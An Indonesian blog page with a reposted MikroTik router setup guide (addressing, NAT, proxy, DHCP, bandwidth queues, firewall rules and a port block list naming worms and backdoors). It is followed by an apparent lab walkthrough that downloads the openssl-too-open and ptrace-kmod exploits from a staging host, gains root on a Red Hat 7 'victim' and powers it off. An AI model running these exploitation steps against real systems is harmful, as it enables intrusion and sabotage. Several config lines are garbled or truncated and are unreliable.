My Blog

Installasi Mikrotik Router

1. Booting melalui CD-ROM

Setelah proses booting akan muncul menu pilihan software yang mau di install, pilih sesuai kebutuhan yang akan direncanakan.

1. Ketik “ i “ setelah selesai memilih software, lalu akan menu pilihan seperti ini :

-Do you want to keep old configuration ? [ y/n]ketik Y

-Continue ? [ y/n] ketik Y

Setelah ituproses installasi system dimulai, disini kita tidak perlu membuat partisi hardisk karena secara otomatis dia akan membuat partisi sendiri.

Proses Installasi

1. Setelah proses installasi selesai maka kita akan di minta untuk merestart system, tekan enter untuk merestart system.

Setelah computer booting kembali ke system mikrotik, akan ada pilihan untuk melakukan check system disk, tekan “ y “ .

1. Setelah itu akan muncul menu login

Mikrotik login = admin

Password = ( kosong , enter saja )

Untuk software license tekan “ y “ . Lalu enter beberapa kali sampai muncul prompt untuk command line.

Prompt command line :

Modul 2

Basic Command

Summary on executing the commands and navigating the menus

Command	Action
command [Enter]	Executes the command
[?]	Shows the list of all available commands
command [?]	Displays help on the command and the list of arguments
command argument [?]	Displays help on the command’s argument
[Tab]	Completes the command/word. If the input is ambiguous, a second [Tab] gives possible options
/	Moves up to the base level
/command	Executes the base level command
..	Moves up one level

List of commands

Commands
certificate	import	log	ppp	redo	Special- login
driver	interface	password	queue	routing	system
ip	ping	quit	setup	tool	file
isdn-channels	user	export	port	radius	snmp
undo

Modul 3

Setting IP Address, Gateway & Name server

1. IP Address

Bentuk perintah konfigurasiip address add address={ ip address / netmask } interface={ nama

interface, ether1 atau ether2 bila ada 2 network card }

Contoh konfigurasi :

Perintah ip address print adalah untuk melihat hasil dari konfigurasi.

2. Gateway

Bentuk perintah konfigurasi :

ip route add gateway={ ip gateway }

\\Contoh konfigurasi :ip route add gateway= 10.2.1.1(jtb)

Perintah ip route print adalah untuk melihat routing table.

3. Name Server

Bentuk perintah konfigurasi :

ip dns set primary-dns={ dns utama } seconday-dns={ dns ke dua }

Contoh konfigurasi :

Perintah ip dns print adalah untuk melihat hasil dari konfigurasi dns.

MODUL 4

Setting Routing

Router adalah sebuah device yang berfungsi untuk meneruskan paket-paket dari sebuah network ke network yang lainnya baik LAN ke LAN atau ke WAN sehingga host-host yang ada pada sebuah network bisa berkomunikasi dengan host-host yang ada pada network yang lain.

Tujuan dari routing adalah agar paket IP kita dikirim sampai pada target, begitu juga paket IP yang ditujukan untuk kita sampai dengan baik. Target atau destination ini bisa berada dalam 1 jaringan atau pun berbeda jaringan baik secara topologis maupun geografis.

Bentuk Perintah konfigurasi :

ip route add dst-address={ ip network atau ip host yang dituju } gateway={ ip gateway untuk melewati paket }

Contoh konfigurasi :

Artinya tujuan network 10.0.0.0/8 lewat gateway 10.2.1.1(jtb)

Artinya tujuan host 0.0.0.0/0 lewat gateway 202.182.48.17

Modul 5

Network Address Translation & Transparent Proxy Server

1. Network Address Translation

Misi awal Internet adalah sebagai jaringan komunikasi non-profit. Pada awalnya, Internet didesain tanpa memperhatikan dunia bisnis. Kemudian hal ini menjadi masalah sekarang dan di masa depan. Dengan semakin banyaknya penghuni Internet, baik pencari informasi maupun penyedia informasi, maka kebutuhan akan pengalamatan di Internet makin membengkak. Kebutuhan besar akan IP address biasanya terjadi di jaringan komputer perusahaan dan LAN-LAN di lembaga pendidikan.

IP address sebagai sarana pengalamatan di Internet semakin menjadi barang mewah dan ekslusif. Tidak sembarang orang sekarang ini bisa mendapatkan IP address public dengan mudah. Oleh karena itulah dibutuhkan suatu mekanisme yang dapat menghemat IP address. Logika sederhana untuk penghematan IP address ialah dengan meng-share suatu nomor IP address public ke komputer clientlainnya. Atau dengan kata lain beberapa komputer bisa mengakses Internet walau kita hanya memiliki satu IP address public. Salah satu Mekanisme itu disediakan oleh Network Address Translation (NAT)

Bentuk perintah konfigurasi :

ip firewall nat add chain=srcnat action=masquerade out-interface= { ether yang langsung terhubung ke internet langsung atau public }

Contoh konfigurasi :

Perintah ip firewall nat print adalah untuk melihat table nat.

2. Transparent Proxy Server

Proxy server merupakan program yang dapat mempercepat akses ke

suatu web yang sudah diakses oleh komputer lain, karena sudah di

simpan didalam caching server.

Transparent proxy menguntungkan dalam management client,

karena system administrator tidak perlu lagi melakukan setup proxy

di setiap browser komputer client karena redirection dilakukan

otomatis di sisi server

Bentuk perintah konfigurasi :

Setting proxy

-ipproxy set enable=yes port={ port yang mau digunakan } maximal-client-connections=1000 maximal-server- connections=1000

-ip proxy direct add src-address={ network yang akan di NAT} action=allow

Contoh konfigurasi :

b. Setting Transparant Proxy

Bentuk perintah konfigurasi :

ip firewall nat add chain=dstnat protocol=tcp dst-port=80

action=redirect to-ports={ port proxy }

Contoh konfigurasi :

Modul 6

DHCP Server

DHCPmerupakan singkatan dari Dynamic Host Configuration Protocol, yaitu suatu program yang memungkinkan pengaturan IP Address di dalam sebuah jaringan dilakukan terpusat di server, sehingga PC Client tidak perlu melakukan konfigurasi IP Addres. DHCP memudahkan administrator untuk melakukan pengalamatan ip address untuk client.

Bentuk perintah konfigurasi :

ip dhcp-server setup

dhcp server interface = { interface yang digunakan }

dhcp server space = { network yang akan di dhcp }

gateway for dhcp network = { ip gateway }

address to give out = { range ip address }

dns servers = { name server }

lease time = { waktu sewa yang diberikan }

Contoh konfigurasi :

MODUL 7

Bandwidth Management

QoS memegang peranan sangat penting dalam halmemberikan pelayanan yang baik pada client. Untuk itu kita memerlukan bandwidth management untuk mengatur tiap data yang lewat, sehingga pembagian bandwidth menjadi adil.

Dalam hal ini Mikrotik RouterOs juga menyertakan packet software untuk memanagement bandwidth.

Contoh Implementasinya seperti di bawah ini :

A. Cara 1

Bentuk perintah konfigurasi:

queue simple add name={ nama } target-addresses={ ip address yang dituju } interface={ interface yang digunakan untuk melewati data } max-limit={ out/in }

Contoh Konfigurasi :

B. cara 2

1. Browse ip router lewat browser kesayangan anda.

2. Masuk ke Menu Simple Queues

Lalu Isi seperti yang direncananaanya :

keterangan :

a.Name = Nama untuk class

b.Out-limit = Bandwidth yang keluar atau uplink

c.In-limit= Bandwidth yang masuk atau downlink

d.Target-ip = IP address yang dituju

e.Interface = Ethernet yang di gunakan untuk keluar data

menuju target ip

f.Time = Waktu yang diberikan untuk pemakaian bandwidth

g.Days= Hari yang diberikan untuk pemakaian bandwidth

Daftar Pustaka

www.mikrotik.com

http://efnet.linux.or.id

www.linux.org

SETTING MICROTIK

• pilihlah paket – paket dibawah ini untuk install OS Microtik :

System, dhcp, Advance Tools, RouTing, Security, Web – Proxy.

• ganti nama system sesuai dengan selera anda :

[admin@microtik] > system identity set name=warnet

Selanjutnya promt shell akan berubah menjadi :
Seperti yg anda inginkan :
[admin@warnet] >

• Ubahlah Password OS microtik anda dengan cara :

[admin@warnet] >user set admin password=………………………………

• aktivkan kedua Ethernet pada PC yang telah anda install OS Microtik :

[admin@warnet] >interface ethernet enable ether1
[admin@warnet] >interface ethernet enable ether2

• Berikan nama pada kedua ethernet untuk memudahkan konfigurasi :

[admin@warnet] >interface Ethernet set ether1 name=modem =====è Ethernet yg utk modem
[admin@warnet] >interface ethernet set ether2 name=local ===è Ethernet yg untuk ke HUB

• Masukan IP pada kedua landcard :

[admin@warnet] >ip address add interface=modem address= ( Diisi IP address dari ISP ) / netmask
[admin@warnet] >ip address add interface=lokal address= 192.168.0.1/255.255.255.0

• masukkan IP gateway yg di berikan dari ISP :

[admin@warnet] > ip route add gateway=10.11.1.1560

• SETTING DNS :

[admin@warnet] >ip dns set primary-dns=10.11.155.1secondary-dns=10.11.155.2

setelah itu coba ping semua IP yang telah di setting di atas.

[b][font=”]KONFIGURASI FIREWALL DAN NETWORK
ip firewall nat add action=masquerade chain=srcnat
ip firewall filter add chain=input connection-state=invalid action=drop
ip firewall filter add chain=input protocol=udp action=accept
ip firewall filter add chain=input protocol=icmp action=accept
[font=”]/ip firewall filter add chain=input in-interface=(ethernet card yg ke lan) action=accept
/ip firewall filter add chain=input in-interface=(ethernet card yg ke internet) action=accept

ip firewall filter add chain=input action=drop

ip web-proxy set enabled=yes src-address=0.0.0.0. port=8080 hostname=”” yahuu.net=yes parent-proxy=0.0.0.0:0 \
cache-administrator=”webmaster” max-object-size=4096KiB cache-drive=system max-cache-size=unlimited \
max-ram-cache-size=unlimited

ip firewall nat add chain=dstnat protocol=tcp dst-port=80 action=redirect to-ports=3128 /ip firewall nat add in-interface=modem
dst-port=80 protocol=tcp action=redirect
to-ports=3128 chain=dstnat dst-address=!192.168.0.1/24

================================================== ================

yang 3128 semuanya di ganti 8080 : caranya :

ip web-proxy set enable=yes
/ip web-proxy set port=3128
/ip web-proxy set max-cache-size=3145728 ( 3 kali total ram )
/ip web-proxy set hostname=”proxy.prima”
/ip web-proxy set allow-remote-requests=yes
/ip web-proxy set cache-administrator: “primanet.slawi@yahoo.com”
================================================== ================================================== ========
FILTERING :
http://www.mikrotik.com/testdocs/ros/2.9/ip/filter.php/ ip firewall filter
add chain=input connection-state=invalid action=drop \comment=”Drop Invalid connections”
add chain=input connection-state=established action=accept \comment=”Allow Established connections”
add chain=input protocol=udp action=accept \ comment=”Allow UDP”
add chain=input protocol=icmp action=accept \ comment=”Allow ICMP”
add chain=input src-address=192.168.0.0/24 action=accept \ comment=”Allow access to router from known network”
add chain=input action=drop comment=”Drop anything else”

ANTI VIRUS UTK MICROTIK :
add chain=forward action=jump jump-target=virus comment=”jump to the virus chain” ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++

add chain=forward protocol=icmp comment=”allow ping”add chain=forward protocol=udp comment=”allow udp”add chain=forward action=drop comment=”drop everything else”================================================== =====

SECURITY ROUTER MICROTIK ANDA :
/ ip firewall filteradd chain=input connection-state=established comment=”Accept established connections”add chain=input connection-state=related comment=”Accept related connections”add chain=input connection-state=invalid action=drop comment=”Drop invalid connections” add chain=input protocol=udp action=accept comment=”UDP” disabled=no add chain=input protocol=icmp limit=50/5s,2 comment=”Allow limited pings” add chain=input protocol=icmp action=drop comment=”Drop excess pings” add chain=input protocol=tcp dst-port=22 comment=”SSH for secure shell”add chain=input protocol=tcp dst-port=8291 comment=”winbox” # Edit these rules to reflect your actual IP addresses! # add chain=input src-address=159.148.172.192/28 comment=”From Mikrotikls network” add chain=input src-address=10.0.0.0/8 comment=”From our private LAN”# End of Edit #add chain=input action=log log-prefix=”DROP INPUT” comment=”Log everything else”add chain=input action=drop comment=”Drop everything else”
“http://wiki.mikrotik.com/wiki/Securing_your_router“
================================================== ========================================
SETTING KEAMANAN JARINGAN HANYA UNTUK LOKAL AREA ANDA :
/ip firewall filteradd chain=forward connection-state=established comment=”allow established connections” add chain=forward connection-state=related comment=”allow related connections”add chain=forward connection-state=invalid action=drop comment=”drop invalid connections”
add chain=virus protocol=tcp dst-port=135-139 action=drop comment=”Drop Blaster Worm” add chain=virus protocol=udp dst-port=135-139 action=drop comment=”Drop Messenger Worm” add chain=virus protocol=tcp dst-port=445 action=drop comment=”Drop Blaster Worm” add chain=virus protocol=udp dst-port=445 action=drop comment=”Drop Blaster Worm” add chain=virus protocol=tcp dst-port=593 action=drop comment=”________” add chain=virus protocol=tcp dst-port=1024-1030 action=drop comment=”________” add chain=virus protocol=tcp dst-port=1080 action=drop comment=”Drop MyDoom” add chain=virus protocol=tcp dst-port=1214 action=drop comment=”________” add chain=virus protocol=tcp dst-port=1363 action=drop comment=”ndm requester” add chain=virus protocol=tcp dst-port=1364 action=drop comment=”ndm server” add chain=virus protocol=tcp dst-port=1368 action=drop comment=”screen cast” add chain=virus protocol=tcp dst-port=1373 action=drop comment=”hromgrafx” add chain=virus protocol=tcp dst-port=1377 action=drop comment=”cichlid” add chain=virus protocol=tcp dst-port=1433-1434 action=drop comment=”Worm” add chain=virus protocol=tcp dst-port=2745 action=drop comment=”Bagle Virus” add chain=virus protocol=tcp dst-port=2283 action=drop comment=”Drop Dumaru.Y” add chain=virus protocol=tcp dst-port=2535 action=drop comment=”Drop Beagle” add chain=virus protocol=tcp dst-port=2745 action=drop comment=”Drop Beagle.C-K” add chain=virus protocol=tcp dst-port=3127-3128 action=drop comment=”Drop MyDoom” add chain=virus protocol=tcp dst-port=3410 action=drop comment=”Drop Backdoor OptixPro”add chain=virus protocol=tcp dst-port=4444 action=drop comment=”Worm” add chain=virus protocol=udp dst-port=4444 action=drop comment=”Worm” add chain=virus protocol=tcp dst-port=5554 action=drop comment=”Drop Sasser” add chain=virus protocol=tcp dst-port=8866 action=drop comment=”Drop Beagle.B” add chain=virus protocol=tcp dst-port=9898 action=drop comment=”Drop Dabber.A-B” add chain=virus protocol=tcp dst-port=10000 action=drop comment=”Drop Dumaru.Y” add chain=virus protocol=tcp dst-port=10080 action=drop comment=”Drop MyDoom.B” add chain=virus protocol=tcp dst-port=12345 action=drop comment=”Drop NetBus” add chain=virus protocol=tcp dst-port=17300 action=drop comment=”Drop Kuang2″ add chain=virus protocol=tcp dst-port=27374 action=drop comment=”Drop SubSeven” add chain=virus protocol=tcp dst-port=65506 action=drop comment=”Drop PhatBot, Agobot, Gaobot”
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++

#MatikanPort yang Biasa di pakai Spam :
/ip firewall filter add chain=forward dst-port=135-139 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=135-139 protocol=udp action=drop
/ip firewall filter add chain=forward dst-port=445 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=445 protocol=udp action=drop
/ip firewall filter add chain=forward dst-port=593 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=4444 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=5554 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=9996 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=995-999 protocol=udp action=drop
/ip firewall filter add chain=forward dst-port=53 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=55 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-p

diatas di cek di websitenya lagi : http://www.mikrotik.com/documentation/manual_2.7/
http://www.mikrotik.com/docs/ros/2.9/ip/webproxy

lihat di system resource
dan 2/3 dari system resource di gunakan atau di alokasikan untuk : system resource print

************************************************** ******************************************
Graphing /tool graphing set store-every=hour[admin@MikroTik] tool graphing> print store-every: hour[admin@MikroTik] tool graphing> [admin@MikroTik] tool graphing interface> add interface=ether1 \allow-address=192.168.0.0/24 store-on-disk=yes[admin@MikroTik] tool graphing interface> printFlags: X - disabled # INTERFACE ALLOW-ADDRESS STORE-ON-DISK 0 ether1 192.168.0.0/24 yes[admin@MikroTik] tool graphing interface> [admin@VLP InWay] tool graphing> export
# oct/12/2005 09:51:23 by RouterOS 2.9.5
# software id = 1TLC-xxx
#
/ tool graphing
set store-every=5min
/ tool graphing queue
add simple-queue=all allow-address=10.8.2.99/32 store-on-disk=yes allow-target=yes disabled=no
/ tool graphing resource
add allow-address=0.0.0.0/0 store-on-disk=yes disabled=no
/ tool graphing interface
add interface=Inway allow-address=0.0.0.0/0 store-on-disk=yes disabled=no
add interface=LAN allow-address=0.0.0.0/0 store-on-disk=yes disabled=no
add interface=DMZ allow-address=0.0.0.0/0 store-on-disk=yes disabled=no

source = http://crypt0gr4phy.wordpress.com/2007/02/02/setting-mikrotik/

//repost

This post is password protected. To view it please enter your password below:

Password:

EXPLOIT PADA LINUX
REDHAT 7

Exploit adalah program penyususup yang buat untuk mencari celah keamanan pada komputer lain dan mendapatkan hak akses administrator guna menguasai komputer tersebut.

langsung saja…

Kami menggunakan
2 komputer untuk mencoba tehnik exploit,
yaitu komputer target sekaligus komputer source dan komputer penyerang (komputer source adalah komputer yang
menyediakan file – file atau source code yang diperlukan dalam tehnik penyerangan).

Kami mencoba untuk memasuki
komputer target dan mendapatkan hak akses sebagai root (aministrator).

Langkah awal yang kami lakukan
adalah mendownload file openssl-too-open.tar.gz
dari komputer source dengan mengetikkan perintah :

#wget http://192.168.10.25/kamjar/openssl-too-open.tar.gz

dimana 192.168.10.25 adalah
alamat IP dari komputer source.

Maka akan muncul tampilan yang
menyatakan download file berhasil dan akan di save ke komputer penyerang
seperti pada gambar di bawah ini :

Untuk memastikan bahwa file
openssl-too-open.tar.gz telah tersimpan maka ketikkan :

#ls –l

untuk melihat isi dari directory
home.

Setelah file
openssl-too-open.tar.gz sudah tersimpan di directory home, extrak file
tersebut.

Akan tetapi sebelum file tersebut
di extrak, ubah hak aksesnya sehingga memiliki hak untuk executable dengan
perintah :

#chmod +x openssl-too-open.tar.gz

Dan ketik :

#ls –l

untuk melihat file tersebut dan
pastikan memiliki hak akses untuk executable.

Extrak file tersebut dengan
perintah :

#tar –zxvf openssl-too-open.tar.gz

Setelah file openssl-too-open
terextrak masuk ke directory openssl-too-open dengan perintah :

#cd openssl-too-open

Setelah masuk ke directory
openssl-too-open, lihat isi dari directory tersebut dengan perintah :

#ls –l

Langkah selanjutnya adalah
melakukan scanning pada komputer target dengan perintah :

#./openssl-scanner –C 192.168.10.25

Maka secara otomatis komputera
akan melakukan scanning 1 subnet pada kelas C

Setelah proses scanning selesai
kita gunakan telnet untuk bisa masuk ke komputer target, kita ketik perintah :

#telnet 192.168.10.25 80 (masuk ke komputer dengan IP 192.168.10.25
melalui port 80 (http))

Komputer akan mencoba masuk ke
komputer korban melalui port 80.

Untuk mengetahui informasi dari
web server komputer korban kita dapat ketikkan :

#GET / HTTP 1.0 /.

Maka akanmuncul tampilan yang
berisikan informasi dari apache server (informasi web server) komputer korban.

Setelah informasi didapat maka
jalankan openssl-too-open dengan parameter dari web server :

#./openssl-too-open –a 0×0b –v 192.168.10.25

Maka akan muncul warning (peringatan),
yang merupakan tanda kita telah masuk ke web server sebagai user dimana user
disini adalah apache.

Untuk mengecek user yang kita
akses maka ketik perintah :

#whoami

Maka kita akan melihat status
kita sebagai apache (user biasa).

Langkah berikutnta adalah masuk
ke direktory tmp, karena di direktory inilah kita dapat merubah hak akses
menjadi root :

#cd /tmp

Setelah itu download file
ptrace-kmod.c dari komputer source lagi dengan perintah :

#wget http://192.168.10.25/kamjar/ptrace-kmod.c

Setelah download selesai untuk
memastikan hasil download benar ketik #ls
–l untuk melihat isi data dari direktory kerja.

Setelah itu eksekusi file
pteace-kmod.c dengan perintah :

#gcc ptrace-kmod

Dari hasil eksekusi file
ptrace-kmod.c maka akanmenghasilkan file a.out

File a.out inilah yang digunakan
untuk merubah hak akses menjadi root

Kita tidak harus mengeksekusi
file ptrace-kmod.c untuk mendapatkan file a.out ini, kita dapat langsung
mendownload file a.out ini sebagai kompiler untuk masuk ke hak akses root,
dengan catatan komputer soure telah melakukan eksekusi pada file ptrace-kmod.c.
dengan perintah :

#wget http://192.168.10.25/kamjar/a.out

 

Lihat data di direktory tmp #ls –l untuk melihat apakah file a.out
ada.

Ubah file permission a.out
tersebut sehingga memiliki hak executable:

#chmod +x a.out

Setelah hak akses dirubah,
eksekusi file ini dengan perintah :

#./a.out

Setelah file tereksekusi maka
kita telah memiliki hak akses root di komputer korban.

Kita cek keberadaan kita dengan
perintah :

#whoami

Maka akan muncul root, sebagai
tanda kita telah berhasil menjadi root di komputer korban

Untuk uji coba kami akan
menmatikan komputer korban, yaitu dengan perintah :

#poweroff

Maka komputer kita akan menerima
pesan warning sebagai tanda komputer korban telah mati.

Wassalam…